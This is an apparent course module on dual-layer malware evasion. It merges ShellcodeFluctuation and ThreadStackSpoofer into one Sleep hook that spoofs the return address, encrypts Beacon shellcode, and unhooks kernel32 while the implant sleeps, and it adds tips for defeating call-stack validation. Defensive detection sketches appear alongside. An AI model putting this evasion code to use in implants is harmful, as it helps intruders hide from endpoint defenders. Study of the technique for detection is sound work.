Module 7: Thread Stack Spoofing Integration
Combining ShellcodeFluctuation with ThreadStackSpoofer for dual-layer evasion — encrypted memory AND clean call stacks.
Module Objective
Understand the call stack detection vector that ShellcodeFluctuation alone does not address, how ThreadStackSpoofer (also by mgeeky) overwrites the return address to terminate stack unwinding, how both techniques integrate through their shared Sleep hook architecture, and the combined evasion profile.
1. The Call Stack Detection Vector
Even with ShellcodeFluctuation encrypting memory and removing the Sleep hook during the idle window, a prominent IOC remains: the thread's call stack. While a thread sleeps, its call stack reveals the chain of function calls that led to the sleep:
// Typical call stack of a sleeping Beacon thread WITHOUT stack spoofing:
//
// ntdll!NtDelayExecution <-- kernel wait
// ntdll!RtlDelayExecution <-- internal delay
// KERNELBASE!SleepEx <-- SleepEx wrapper
// kernel32!Sleep <-- Sleep API
// 0x000001A0004532 <-- MySleep (in loader memory)
// 0x000001A00023A8 <-- Beacon shellcode (SUSPICIOUS!)
// 0x000001A00001C0 <-- Beacon entry point (SUSPICIOUS!)
// ntdll!RtlUserThreadStart <-- thread start
//
// Frames 0x1A00... point to private, non-image memory.
// This is a strong IOC: call stacks of legitimate threads normally
// resolve to loaded DLLs (image-backed memory); JIT runtimes are the usual exception
Why This Matters
Security tools like Process Hacker, Moneta, and EDR products can walk thread call stacks using StackWalk64 or RtlVirtualUnwind. Return addresses pointing to private (non-image) memory are strong indicators of injected code. ShellcodeFluctuation encrypts the memory content, but the return addresses on the stack still point to the shellcode allocation's address range.
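The check described above can be sketched from the scanner's side. The following is a minimal, portable model, not the logic of any named tool: `ModuleRange`, `owningModule`, and `unbackedFrames` are hypothetical names, and the module list is supplied by hand rather than read from a live process.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Hypothetical description of one image-backed region (a loaded module).
struct ModuleRange {
    std::string name;
    std::uint64_t base;
    std::uint64_t size;
};

// Returns the name of the module containing addr, or an empty string when
// the address is not inside any known image (i.e. private memory).
std::string owningModule(std::uint64_t addr,
                         const std::vector<ModuleRange>& modules) {
    for (const auto& m : modules) {
        if (addr >= m.base && addr - m.base < m.size) {
            return m.name;
        }
    }
    return {};
}

// Collects every return address that does not fall inside a known module.
std::vector<std::uint64_t> unbackedFrames(
        const std::vector<std::uint64_t>& returnAddresses,
        const std::vector<ModuleRange>& modules) {
    std::vector<std::uint64_t> suspicious;
    for (std::uint64_t ra : returnAddresses) {
        if (owningModule(ra, modules).empty()) {
            suspicious.push_back(ra);
        }
    }
    return suspicious;
}
```

Fed the return addresses from the listing above, a model like this would flag the `0x1A00...` frames, because no module range contains them.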
2. ThreadStackSpoofer Concept
ThreadStackSpoofer (by mgeeky / Mariusz Banach) addresses the call stack IOC by overwriting the return address that traces back to the shellcode with a null value, effectively terminating the stack walk:
Stack Before vs After Spoofing
Before spoofing, the stack shows the full chain:
Sleep → MySleep → Beacon
After spoofing, the stack terminates early:
Sleep → MySleep → 0x0
The key mechanism is simple: overwrite the return address of the hook handler frame so that stack unwinding cannot reach the shellcode frames below:
// ThreadStackSpoofer core mechanism
void WINAPI MySleep_WithStackSpoof(DWORD dwMilliseconds) {
    // _AddressOfReturnAddress() returns a pointer to the
    // return address stored on the stack for THIS function.
    // This return address points back into the Beacon shellcode.
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();

    // Save the original return address (we need it to get back!)
    const auto origReturnAddress = *overwrite;

    // Overwrite with 0 - stack unwinding will stop here
    *overwrite = 0;

    // ... perform Sleep (stack now looks clean) ...

    // Restore original return address before returning
    *overwrite = origReturnAddress;
}
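The save, overwrite, and restore steps form a scoped pattern, which can be illustrated on an ordinary variable. This is a minimal sketch under stated assumptions: `ScopedSlotZero` and `observeWhileGuarded` are hypothetical names, and the slot is a plain integer standing in for a return address slot, not a real stack location.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical RAII helper: zeroes a pointer-sized slot for the lifetime of
// the guard and writes the saved value back when the guard is destroyed.
class ScopedSlotZero {
public:
    explicit ScopedSlotZero(std::uint64_t* slot)
        : slot_(slot), saved_(*slot) {
        assert(slot != nullptr);
        *slot_ = 0;
    }
    ~ScopedSlotZero() { *slot_ = saved_; }

    // Copying would restore the same slot twice, so it is disabled.
    ScopedSlotZero(const ScopedSlotZero&) = delete;
    ScopedSlotZero& operator=(const ScopedSlotZero&) = delete;

    std::uint64_t saved() const { return saved_; }

private:
    std::uint64_t* slot_;
    std::uint64_t saved_;
};

// Stand-in for the hook body: reports what an observer would read from the
// slot while the guard is alive. The slot is restored on return.
std::uint64_t observeWhileGuarded(std::uint64_t* slot) {
    ScopedSlotZero guard(slot);
    return *slot;
}
```

The point of the scoped form is that the restore cannot be skipped on any exit path, which mirrors the requirement that the original value be back in place before the function returns.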
3. How _AddressOfReturnAddress Works
_AddressOfReturnAddress() is an MSVC compiler intrinsic that returns a pointer to the stack slot holding the current function's return address. The value stored in that slot is what RET pops when the function returns:
// Stack layout when MySleep is called:
//
// Higher addresses (top of stack diagram)
// +--------------------------+
// | Beacon shellcode frame | <-- caller of Sleep
// +--------------------------+
// | Return addr to Beacon | <-- THIS is what _AddressOfReturnAddress points to
// +--------------------------+
// | MySleep local variables |
// +--------------------------+
// | Return addr to MySleep | <-- for functions MySleep calls
// +--------------------------+
// | Sleep/SleepEx frame |
// +--------------------------+
// Lower addresses (bottom of stack diagram)
//
// By overwriting "Return addr to Beacon" with 0:
// Stack walkers see: Sleep -> MySleep -> 0x0 (end)
// They never reach the Beacon frames, which sit at higher addresses
Why Not Overwrite More Frames?
Overwriting a single return address is sufficient because stack walkers (on x64, loops built around RtlVirtualUnwind) stop when the recovered return address is null or when a frame cannot be unwound. Zeroing one slot therefore ends the entire walk, and the caller frames beyond it are never visited. Those frames still exist in stack memory; they are only unreachable through unwinding.
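The termination behaviour can be shown with a toy model. This is a simplified sketch, not how RtlVirtualUnwind works internally: a real walker recovers each return address from unwind metadata, whereas here the addresses are simply stored in a vector, and `walkFrames` is a hypothetical name.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Toy model of a stack walk: frames[i] is the return address that leads
// from frame i to its caller, listed from the innermost frame outward.
// The walk stops at the first null return address.
std::vector<std::uint64_t> walkFrames(const std::vector<std::uint64_t>& frames,
                                      std::size_t maxFrames = 64) {
    std::vector<std::uint64_t> visited;
    for (std::size_t i = 0; i < frames.size() && i < maxFrames; ++i) {
        if (frames[i] == 0) {
            break;  // null return address: nothing further is visited
        }
        visited.push_back(frames[i]);
    }
    return visited;
}
```

Zeroing one entry hides that entry and every entry after it from the result, even though the later values are still present in the input.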
4. Integrating Both Techniques
ShellcodeFluctuation and ThreadStackSpoofer share the same hook point (kernel32!Sleep) and the same author. Combining them is architecturally straightforward — both sets of operations happen in the same MySleep handler:
void WINAPI MySleep_Combined(DWORD dwMilliseconds) {
    // ========================================
    // STACK SPOOFING: Save and overwrite return address
    // ========================================
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;
    *overwrite = 0; // Terminate stack walk

    // ========================================
    // FLUCTUATION: Encrypt shellcode memory
    // ========================================
    DWORD oldProt;
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_READWRITE, &oldProt);
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);

    // ========================================
    // UNHOOK: Clean kernel32!Sleep
    // ========================================
    DWORD hookProt;
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.originalBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // SLEEP: Maximum stealth state
    // ========================================
    // At this point:
    // - Shellcode memory: RW + encrypted (invisible)
    // - Call stack: terminates at 0 (no shellcode refs)
    // - kernel32!Sleep: unhooked (clean)
    Sleep(dwMilliseconds);

    // ========================================
    // REHOOK: Reinstall Sleep interception
    // ========================================
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   PAGE_EXECUTE_READWRITE, &hookProt);
    memcpy(g_state.sleepFunc, g_state.hookBytes, g_state.hookSize);
    VirtualProtect(g_state.sleepFunc, g_state.hookSize,
                   hookProt, &hookProt);

    // ========================================
    // FLUCTUATION: Decrypt shellcode memory
    // ========================================
    xor32((BYTE*)g_state.shellcodeBase, g_state.shellcodeSize,
          g_state.xorKey);
    VirtualProtect(g_state.shellcodeBase, g_state.shellcodeSize,
                   PAGE_EXECUTE_READ, &oldProt);

    // ========================================
    // STACK RESTORE: Put back original return address
    // ========================================
    *overwrite = origReturnAddress;

    // Return to Beacon - execution continues normally
}
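The handler calls `xor32` twice with the same key and relies on the second call undoing the first, but the routine itself is not shown in this module. The following is a minimal sketch of a repeating 32-bit XOR that has that property. It is an assumption about the routine's shape, not the tool's actual implementation, and `xor32Copy` is a hypothetical helper added for illustration.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

// Sketch of a repeating 32-bit XOR over a byte buffer. Byte i is combined
// with key byte (i % 4), least significant byte first. Applying the
// function twice with the same key restores the original bytes.
void xor32(std::uint8_t* buf, std::size_t size, std::uint32_t key) {
    assert(buf != nullptr || size == 0);
    for (std::size_t i = 0; i < size; ++i) {
        buf[i] ^= static_cast<std::uint8_t>(key >> (8 * (i % 4)));
    }
}

// Convenience wrapper: returns a transformed copy, leaving the input intact.
std::vector<std::uint8_t> xor32Copy(std::vector<std::uint8_t> data,
                                    std::uint32_t key) {
    xor32(data.data(), data.size(), key);
    return data;
}
```

Because XOR is its own inverse, the same call serves as both the encrypt and the decrypt step, which is why the handler needs no separate decryption routine. The buffer length does not have to be a multiple of four in this sketch.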
5. Dual-Layer Evasion Profile
When both techniques are active during the sleep window, the evasion profile is significantly stronger than either technique alone:
| Detection Vector | Fluctuation Only | Stack Spoof Only | Combined |
|---|---|---|---|
| Private executable memory | Evaded (RW during sleep) | Not addressed | Evaded |
| Shellcode signatures | Evaded (encrypted) | Not addressed | Evaded |
| Beacon config patterns | Evaded (XOR32) | Not addressed | Evaded |
| Call stack to private memory | Not addressed | Evaded (return addr = 0) | Evaded |
| Sleep hook in kernel32 | Evaded (unhook during sleep) | Not addressed | Evaded |
| Thread start address | Not addressed | Not addressed | Not addressed |
| kernel32 private pages (CoW) | Partially addressed | Not relevant | Partially addressed |
Remaining IOCs
Even with both techniques, the thread's start address still points to private memory (the CreateThread target). This is a fundamental IOC that cannot be addressed by post-creation techniques. Solutions include starting the thread on a legitimate DLL function and redirecting via APC, or using thread pool callbacks.
6. Ordering Considerations
The combined approach has specific ordering requirements for the stack spoofing operations:
Operation Order
- Spoof stack FIRST: overwrite the return address before any operations that might be observed. A scanner running between steps sees a clean stack from the earliest possible moment.
- Encrypt shellcode: now the memory content is hidden
- Unhook Sleep: remove the last easily-visible IOC
- Sleep: in the maximally hidden state
- Rehook Sleep: prepare for next cycle
- Decrypt shellcode: restore executable content
- Restore stack LAST: the return address must be valid for the RET instruction
Restoring the return address must happen last, just before the function returns. If it were restored before decryption, a scanner could briefly see the return address pointing to shellcode memory. If it were never restored, the function would return to address 0 and crash.
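The ordering argument can be checked with a small state model that replays the seven steps and records what an outside observer could see after each one. This is a sketch only: `Observable`, `Snapshot`, `replaySleepCycle`, and `visibleCount` are hypothetical names, and the three booleans are a deliberate simplification of the indicators discussed in this module.

```cpp
#include <cassert>
#include <string>
#include <vector>

// Hypothetical model of what an external scanner could observe.
struct Observable {
    bool stackPointsToShellcode = true;
    bool shellcodePlaintext = true;
    bool sleepHooked = true;
};

struct Snapshot {
    std::string step;
    Observable state;
};

// Replays the seven steps in order and records the state after each one.
std::vector<Snapshot> replaySleepCycle() {
    Observable s;
    std::vector<Snapshot> trace;
    auto record = [&](const std::string& step) {
        trace.push_back(Snapshot{step, s});
    };

    s.stackPointsToShellcode = false; record("spoof stack");
    s.shellcodePlaintext = false;     record("encrypt");
    s.sleepHooked = false;            record("unhook");
    record("sleep");
    s.sleepHooked = true;             record("rehook");
    s.shellcodePlaintext = true;      record("decrypt");
    s.stackPointsToShellcode = true;  record("restore stack");
    return trace;
}

// Number of indicators visible in a snapshot.
int visibleCount(const Observable& o) {
    return int(o.stackPointsToShellcode) + int(o.shellcodePlaintext) +
           int(o.sleepHooked);
}
```

In this model the stack indicator is hidden from the first step through the sixth, and all three indicators are hidden only during the sleep step, which matches the reasoning for spoofing first and restoring last.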
7. Advanced Stack Spoofing Considerations
The basic *overwrite = 0 approach has a weakness: a zero return address is itself anomalous. More sophisticated approaches create a fake but plausible call stack:
// Advanced: Spoof with a plausible return address
// Instead of 0, use an address inside a legitimate DLL
void WINAPI MySleep_AdvancedSpoof(DWORD dwMilliseconds) {
    auto overwrite = (PULONG_PTR)_AddressOfReturnAddress();
    const auto origReturnAddress = *overwrite;

    // Option 1: Use a known-good return address
    // e.g., inside ntdll!RtlUserThreadStart
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    FARPROC threadStart = GetProcAddress(hNtdll, "RtlUserThreadStart");
    *overwrite = (ULONG_PTR)threadStart;

    // Now the stack looks like:
    // Sleep -> MySleep -> RtlUserThreadStart (image-backed)
    // Caveat: this is the function's entry point, not an address that
    // follows a CALL, so stricter validation can still flag it.

    // ... fluctuation + sleep ...

    *overwrite = origReturnAddress;
}

// Option 2: Craft a complete fake frame chain
// This requires understanding x64 unwind metadata and
// creating synthetic RUNTIME_FUNCTION entries, which is
// significantly more complex (see SilentMoonwalk, Unwinder)
Call Stack Validation
Modern EDR solutions are becoming more sophisticated at validating call stacks. They may verify that each return address immediately follows a CALL instruction, check that frames are consistent with the module's unwind metadata, or compare stacks against known-good patterns. Simple spoofing (setting the return address to 0 or to an arbitrary DLL address) may be detected by these checks. Full call stack fabrication (as in SilentMoonwalk) is significantly more complex but more robust.
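The first of these checks can be sketched as a byte-level heuristic: a genuine return address is the address of the instruction after a CALL, so the bytes just before it should decode as one. The function below is a rough illustration under stated assumptions, not the logic of any specific product. `looksLikeReturnSite` is a hypothetical name, only the common x64 encodings are covered, and the ModRM byte is not cross-checked against the instruction length, so false positives are possible.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// Heuristic: do the bytes ending at `offset` look like an x64 CALL?
// Encodings checked:
//   E8 rel32          direct call, 5 bytes
//   FF /2 (ModRM)     indirect call, tried at lengths 2, 3, 6 and 7
// A REX prefix does not change the distance from FF to the return site,
// so it needs no special handling here.
bool looksLikeReturnSite(const std::uint8_t* code, std::size_t size,
                         std::size_t offset) {
    assert(code != nullptr);
    if (offset > size) {
        return false;
    }
    if (offset >= 5 && code[offset - 5] == 0xE8) {
        return true;
    }
    const std::size_t lengths[] = {2, 3, 6, 7};
    for (std::size_t len : lengths) {
        if (offset < len) {
            continue;
        }
        const std::uint8_t opcode = code[offset - len];
        const std::uint8_t modrm = code[offset - len + 1];
        // The reg field of ModRM (bits 3..5) selects the operation; 2 is CALL.
        if (opcode == 0xFF && ((modrm >> 3) & 7) == 2) {
            return true;
        }
    }
    return false;
}
```

An address at the first byte of a function fails a check like this whenever the bytes before it belong to padding or to the end of the previous function, which is one reason a spoofed entry-point address can stand out.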
8. Implementation Notes and Caveats
Practical Considerations
| Topic | Details |
|---|---|
| Compiler optimization | _AddressOfReturnAddress() is resolved for the function it appears in, so the handler must remain a real, non-inlined function. Mark it __declspec(noinline) or wrap it in #pragma optimize("", off). /Oy- (do not omit frame pointers) applies only to x86 builds; x64 compilers do not offer it |
| x64 unwind info | x64 Windows uses table-based exception handling. The stack spoof works because stack walkers rely on return addresses for unwinding. Setting a return address to 0 causes the unwind to terminate gracefully |
| Debug builds | Debug builds typically disable optimization and add runtime checks (/RTC), so the frame is larger and laid out differently than in Release. The intrinsic locates the return address slot in both configurations, so stack spoofing works in either |
| Thread count | Both techniques operate per-thread. If the implant spawns worker threads, each thread that calls Sleep will trigger its own fluctuation+spoof cycle |
| Non-Sleep waits | If the implant uses WaitForSingleObject or WaitForMultipleObjects instead of Sleep, those functions would also need to be hooked for complete coverage |
Same Author, Same Architecture
A key advantage of combining ShellcodeFluctuation and ThreadStackSpoofer is that both tools were designed by the same author (mgeeky) with integration in mind. They share the same hooking architecture (inline hook on kernel32!Sleep), the same loader pattern (VirtualAlloc + memcpy + CreateThread), and compatible state management. Merging them into a single MySleep handler is a natural architectural fit.
Knowledge Check
Q1: What detection vector does ThreadStackSpoofer address that ShellcodeFluctuation does not?
Q2: How does ThreadStackSpoofer terminate the stack walk?
Q3: Why must the original return address be restored LAST, just before MySleep returns?